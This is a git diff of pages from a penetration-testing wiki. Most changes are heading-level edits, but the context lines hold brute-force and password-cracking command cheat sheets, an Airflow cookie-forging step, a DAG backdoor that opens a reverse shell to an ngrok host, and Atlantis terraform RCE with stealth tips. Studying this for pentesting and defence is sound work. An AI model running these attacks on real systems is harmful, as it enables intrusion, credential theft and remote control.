* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
-## Services
+# Services
Ordered alphabetically by service name.
-### AFP
+## AFP
```bash
nmap -p 548 --script afp-brute
@@ -107,38 +105,38 @@ msf> set USER_FILE
msf> run
```
-### AJP
+## AJP
```bash
nmap --script ajp-brute -p 8009
```
-### Cassandra
+## Cassandra
```bash
nmap --script cassandra-brute -p 9160
```
-### CouchDB
+## CouchDB
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
-### Docker Registry
+## Docker Registry
```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
```
-### Elasticsearch
+## Elasticsearch
```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```
-### FTP
+## FTP
```bash
hydra -l root -P passwords.txt [-t 32] ftp
@@ -146,11 +144,11 @@ ncrack -p 21 --user root -P passwords.txt [-T 5]
medusa -u root -P 500-worst-passwords.txt -h -M ftp
```
-### HTTP Generic Brute
+## HTTP Generic Brute
-#### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)
+### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)
-### HTTP Basic Auth
+## HTTP Basic Auth
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
@@ -158,7 +156,7 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
medusa -h -u -P -M http -m DIR:/path/to/auth -T 10
```
-### HTTP - Post Form
+## HTTP - Post Form
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
@@ -167,13 +165,13 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
For http**s** you have to change from "http-post-form" to "**https-post-form"**
-### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
+## **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```
-### IMAP
+## IMAP
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f imap -V
@@ -181,19 +179,19 @@ hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V
nmap -sV --script imap-brute -p
```
-### IRC
+## IRC
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p
```
-### ISCSI
+## ISCSI
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260
```
-### JWT
+## JWT
```bash
#hashcat
@@ -218,26 +216,26 @@ python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1w
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
-### LDAP
+## LDAP
```bash
nmap --script ldap-brute -p 389
```
-### MQTT
+## MQTT
```
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
```
-### Mongo
+## Mongo
```bash
nmap -sV --script mongodb-brute -n -p 27017
use auxiliary/scanner/mongodb/mongodb_login
```
-### MySQL
+## MySQL
```bash
# hydra
@@ -250,7 +248,7 @@ msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
medusa -h -u -P <-f | to stop medusa on first success attempt> -t -M mysql
```
-### OracleSQL
+## OracleSQL
```bash
patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
@@ -286,14 +284,14 @@ pip3 install cx_Oracle --upgrade
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
```
-### POP
+## POP
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V
```
-### PostgreSQL
+## PostgreSQL
```bash
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres
@@ -304,7 +302,7 @@ use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432
```
-### PPTP
+## PPTP
You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
@@ -313,14 +311,14 @@ sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u
```
-### RDP
+## RDP
```bash
ncrack -vv --user -P pwds.txt rdp://
hydra -V -f -L -P rdp://
```
-### Redis
+## Redis
```bash
msf> use auxiliary/scanner/redis/redis_login
@@ -328,19 +326,19 @@ nmap --script redis-brute -p 6379
hydra –P /path/pass.txt redis://: # 6379 is the default
```
-### Rexec
+## Rexec
```bash
hydra -l -P rexec:// -v -V
```
-### Rlogin
+## Rlogin
```bash
hydra -l -P rlogin:// -v -V
```
-### Rsh
+## Rsh
```bash
hydra -L rsh:// -v -V
@@ -348,19 +346,19 @@ hydra -L rsh:// -v -V
[http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
-### Rsync
+## Rsync
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873
```
-### RTSP
+## RTSP
```bash
hydra -l root -P passwords.txt rtsp
```
-### SNMP
+## SNMP
```bash
msf> use auxiliary/scanner/snmp/snmp_login
@@ -369,27 +367,27 @@ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
-### SMB
+## SMB
```bash
nmap --script smb-brute -p 445
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```
-### SMTP
+## SMTP
```bash
hydra -l -P /path/to/passwords.txt smtp -V
hydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL
```
-### SOCKS
+## SOCKS
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080
```
-### SQL Server
+## SQL Server
```bash
#Use the NetBIOS name of the machine as domain
@@ -400,7 +398,7 @@ nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=cust
msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
```
-### SSH
+## SSH
```bash
hydra -l root -P passwords.txt [-t 32] ssh
@@ -409,7 +407,7 @@ medusa -u root -P 500-worst-passwords.txt -h -M ssh
patator ssh_login host= port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
```
-### Telnet
+## Telnet
```bash
hydra -l root -P passwords.txt [-t 32] telnet
@@ -417,7 +415,7 @@ ncrack -p 23 --user root -P passwords.txt [-T 5]
medusa -u root -P 500-worst-passwords.txt -h -M telnet
```
-### VNC
+## VNC
```bash
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc
@@ -432,15 +430,15 @@ set RHOSTS
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```
-### Winrm
+## Winrm
```bash
crackmapexec winrm -d -u usernames.txt -p passwords.txt
```
-## Local
+# Local
-### Online cracking databases
+## Online cracking databases
* [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
@@ -455,7 +453,7 @@ crackmapexec winrm -d -u usernames.txt -p passwords.txt
Check this out before trying to bruteforce a Hash.
-### ZIP
+## ZIP
```bash
#sudo apt-get install fcrackzip
@@ -473,7 +471,7 @@ hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
-### 7z
+## 7z
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
@@ -486,7 +484,7 @@ apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
-### PDF
+## PDF
```bash
apt-get install pdfcrack
@@ -497,7 +495,7 @@ sudo apt-get install qpdf
qpdf --password= --decrypt encrypted.pdf plaintext.pdf
```
-### JWT
+## JWT
```bash
git clone https://github.com/Sjord/jwtcrack.git
@@ -511,7 +509,7 @@ python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h
john jwt.john #It does not work with Kali-John
```
-### NTLM cracking
+## NTLM cracking
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
@@ -519,7 +517,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
-### Keepass
+## Keepass
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
@@ -529,7 +527,7 @@ keepass2john -k file.kdbx > hash # The keepas is also using a fi
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
-### Keberoasting
+## Keberoasting
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
@@ -537,9 +535,9 @@ hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
-### Lucks image
+## Lucks image
-#### Method 1
+### Method 1
Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
@@ -550,7 +548,7 @@ ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
-#### Method 2
+### Method 2
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
@@ -563,7 +561,7 @@ mount /dev/mapper/mylucksopen /mnt
Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
-### Mysql
+## Mysql
```bash
#John hash format
@@ -571,14 +569,14 @@ Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
-### PGP/GPG Private key
+## PGP/GPG Private key
```bash
gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
-### Open Office Pwd Protected Column
+## Open Office Pwd Protected Column
If you have xlsx file with a column protected by password you can unprotect it:
@@ -594,7 +592,7 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV
zip -r file.xls .
```
-### PFX Certificates
+## PFX Certificates
```bash
# From https://github.com/Ridter/p12tool
@@ -603,18 +601,18 @@ zip -r file.xls .
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
-## Tools
+# Tools
**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
-### Hash-identifier
+## Hash-identifier
```bash
hash-identifier
>
```
-### John mutation
+## John mutation
Read _**/etc/john/john.conf**_ and configure it
@@ -623,7 +621,7 @@ john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
-### Hashcat
+## Hashcat
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
diff --git a/burp-suite.md b/burp-suite.md
index f643241a..db4fad48 100644
--- a/burp-suite.md
+++ b/burp-suite.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Burp Suite
-
-## Basic Payloads
+# Basic Payloads
* **Simple List:** Just a list containing an entry in each line
* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
diff --git a/certificates.md b/certificates.md
index d8afe3bb..ae477e10 100644
--- a/certificates.md
+++ b/certificates.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Certificates
-
-## What is a Certificate
+# What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner \(called the subject\), and the digital signature of an entity that has verified the certificate's contents \(called the issuer\). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@@ -27,7 +25,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure \(X.509\)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
-## x509 Common Fields
+# x509 Common Fields
* **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@@ -69,7 +67,7 @@ The most common format for public key certificates is defined by [X.509](https:/
* Address of the **OCSP responder from where revocation of this certificate** can be checked \(OCSP access method\).
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
-### Difference between OSCP and CRL Distribution Points
+## Difference between OSCP and CRL Distribution Points
**OCSP** \(RFC 2560\) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.
diff --git a/cloud-security/apache-airflow/README.md b/cloud-security/apache-airflow/README.md
index c9dba9fe..d6af69ab 100644
--- a/cloud-security/apache-airflow/README.md
+++ b/cloud-security/apache-airflow/README.md
@@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Apache Airflow
-
-## Basic Information
+# Basic Information
[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications.
Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**.
-## Local Lab
+# Local Lab
-### Docker-Compose
+## Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
-### Minikube
+## Minikube
One easy way to **run apache airflo**w is to run it **with minikube**:
@@ -45,7 +43,7 @@ helm install airflow-release airflow-stable/airflow
helm delete airflow-release
```
-## Airflow Configuration
+# Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
@@ -53,7 +51,7 @@ Airflow might store **sensitive information** in its configuration or you can fi
[airflow-configuration.md](airflow-configuration.md)
{% endcontent-ref %}
-## Airflow RBAC
+# Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**:
@@ -61,9 +59,9 @@ Before start attacking Airflow you should understand **how permissions work**:
[airflow-rbac.md](airflow-rbac.md)
{% endcontent-ref %}
-## Attacks
+# Attacks
-### Web Console Enumeration
+## Web Console Enumeration
If you have **access to the web console** you might be able to access some or all of the following information:
@@ -73,7 +71,7 @@ If you have **access to the web console** you might be able to access some or al
* List **users & roles**
* **Code of each DAG** (which might contain interesting info)
-### Privilege Escalation
+## Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
@@ -81,7 +79,7 @@ If the **`expose_config`** configuration is set to **True**, from the **role Use
flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
-### DAG Backdoor (RCE in Airflow worker)
+## DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
@@ -125,7 +123,7 @@ with DAG(
)
```
-### DAG Backdoor (RCE in Airflow scheduler)
+## DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
@@ -153,7 +151,7 @@ with DAG(
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
-### DAG Creation
+## DAG Creation
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md
index 1a3b65c5..5f1d97cf 100644
--- a/cloud-security/apache-airflow/airflow-configuration.md
+++ b/cloud-security/apache-airflow/airflow-configuration.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Airflow Configuration
-
-## Configuration File
+# Configuration File
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
@@ -32,7 +30,7 @@ If you have **access to some machine inside the airflow env**, check the **envir
Some interesting values to check when reading the config file:
-### \[api]
+## \[api]
* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
@@ -47,12 +45,12 @@ Some interesting values to check when reading the config file:
* You can also **create you own authentication** method with python.
* **`google_key_path`:** Path to the **GCP service account key**
-### **\[atlas]**
+## **\[atlas]**
* **`password`**: Atlas password
* **`username`**: Atlas username
-### \[celery]
+## \[celery]
* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
* **`result_backend`**: Postgres url which may contain **credentials**.
@@ -60,39 +58,39 @@ Some interesting values to check when reading the config file:
* **`ssl_cert`**: Path to the cert
* **`ssl_key`**: Path to the key
-### \[core]
+## \[core]
* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`.
* **`fernet_key`**: Key to store encrypted variables (symmetric)
* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
* **`security`**: What security module to use (for example kerberos)
-### \[dask]
+## \[dask]
* **`tls_ca`**: Path to ca
* **`tls_cert`**: Part to the cert
* **`tls_key`**: Part to the tls key
-### \[kerberos]
+## \[kerberos]
* **`ccache`**: Path to ccache file
* **`forwardable`**: Enabled by default
-### \[logging]
+## \[logging]
* **`google_key_path`**: Path to GCP JSON creds.
-### \[secrets]
+## \[secrets]
* **`backend`**: Full class name of secrets backend to enable
* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
-### \[smtp]
+## \[smtp]
* **`smtp_password`**: SMTP password
* **`smtp_user`**: SMTP user
-### \[webserver]
+## \[webserver]
* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
* **`cookie_secure`**: Set **secure flag** on the the session cookie
@@ -103,7 +101,7 @@ Some interesting values to check when reading the config file:
* **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
-### Web Authentication
+## Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
diff --git a/cloud-security/apache-airflow/airflow-rbac.md b/cloud-security/apache-airflow/airflow-rbac.md
index ac2d2558..a2ba87f3 100644
--- a/cloud-security/apache-airflow/airflow-rbac.md
+++ b/cloud-security/apache-airflow/airflow-rbac.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Airflow RBAC
-
-## RBAC
+# RBAC
Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
@@ -33,7 +31,7 @@ Note that **admin** users can **create more roles** with more **granular permiss
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
-### Default Permissions
+## Default Permissions
These are the default permissions per default role:
diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md
index 781563f1..a315826e 100644
--- a/cloud-security/atlantis.md
+++ b/cloud-security/atlantis.md
@@ -16,24 +16,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Atlantis
-### Basic Information
+# Basic Information
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
 (3).png>)
-### Local Lab
+# Local Lab
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in 127.0.0.1:4141
-### Atlantis Access
+# Atlantis Access
-#### Git Server Credentials
+## Git Server Credentials
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
@@ -43,7 +42,7 @@ However, in order to access the repos in those platforms and perform actions, it
In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
{% endhint %}
-#### Webhooks
+## Webhooks
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
@@ -55,7 +54,7 @@ Note that unless you use a private github or bitbucket server, you will need to
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
{% endhint %}
-#### Provider Credentials
+## Provider Credentials
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
@@ -73,13 +72,13 @@ It's up to you how you [provide credentials](https://www.runatlantis.io/docs/pro
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
{% endhint %}
-#### Web Page
+## Web Page
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
-### Server Configuration
+# Server Configuration
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
@@ -96,7 +95,7 @@ Values are **chosen in this order**:
Note that in the configuration you might find interesting values such as **tokens and passwords**.
{% endhint %}
-#### Repos Configuration
+## Repos Configuration
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
@@ -155,7 +154,7 @@ Atlantis supports running **server-side** [**conftest**](https://www.conftest.de
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
-### Atlantis Commands
+# Atlantis Commands
\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
@@ -165,24 +164,24 @@ atlantis help
# Run terraform plan
atlantis plan [options] -- [terraform plan flags]
-##Options:
-## -d directory
-## -p project
-## --verbose
-## You can also add extra terraform options
+#Options:
+# -d directory
+# -p project
+# --verbose
+# You can also add extra terraform options
# Run terraform apply
atlantis apply [options] -- [terraform apply flags]
-##Options:
-## -d directory
-## -p project
-## -w workspace
-## --auto-merge-disabled
-## --verbose
-## You can also add extra terraform options
+#Options:
+# -d directory
+# -p project
+# -w workspace
+# --auto-merge-disabled
+# --verbose
+# You can also add extra terraform options
```
-### Attacks
+# Attacks
{% hint style="warning" %}
If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
@@ -195,7 +194,7 @@ atlantis plan -- -lock=false
```
{% endhint %}
-#### Atlantis plan RCE - Config modification in new PR
+## Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
@@ -224,7 +223,7 @@ You can find the rev shell code in [https://github.com/carlospolop/terraform\_ex
* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
-#### Atlantis apply RCE - Config modification in new PR
+## Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
@@ -256,7 +255,7 @@ resource "null_resource" "rev_shell" {
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
-#### Terraform Param Injection
+## Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
@@ -270,7 +269,7 @@ atlantis apply -- -h #Get terraform apply help
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
-#### Custom Workflow
+## Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
This possibility was mentioned in a previous section:
@@ -297,7 +296,7 @@ workflows:
```
{% endhint %}
-#### PR Hijacking
+## PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
@@ -307,11 +306,11 @@ This is the **setting** in Github branch protections:
 (1).png>)
-#### Webhook Secret
+## Webhook Secret
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
-#### Bitbucket
+## Bitbucket
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
@@ -319,7 +318,7 @@ Bitbucket Cloud does **not support webhook secrets**. This could allow attackers
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
-### Post-Exploitation
+# Post-Exploitation
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
@@ -330,17 +329,17 @@ If you managed to get access to the server or at least you got a LFI there are s
* `/proc/1/environ` Env variables
* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
-### Mitigations
+# Mitigations
-#### Don't Use On Public Repos
+## Don't Use On Public Repos
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
-#### Don't Use `--allow-fork-prs`
+## Don't Use `--allow-fork-prs`
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
-#### `--repo-allowlist`
+## `--repo-allowlist`
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
@@ -351,7 +350,7 @@ Atlantis requires you to specify a allowlist of repositories it will accept webh
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
-#### Protect Terraform Planning
+## Protect Terraform Planning
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
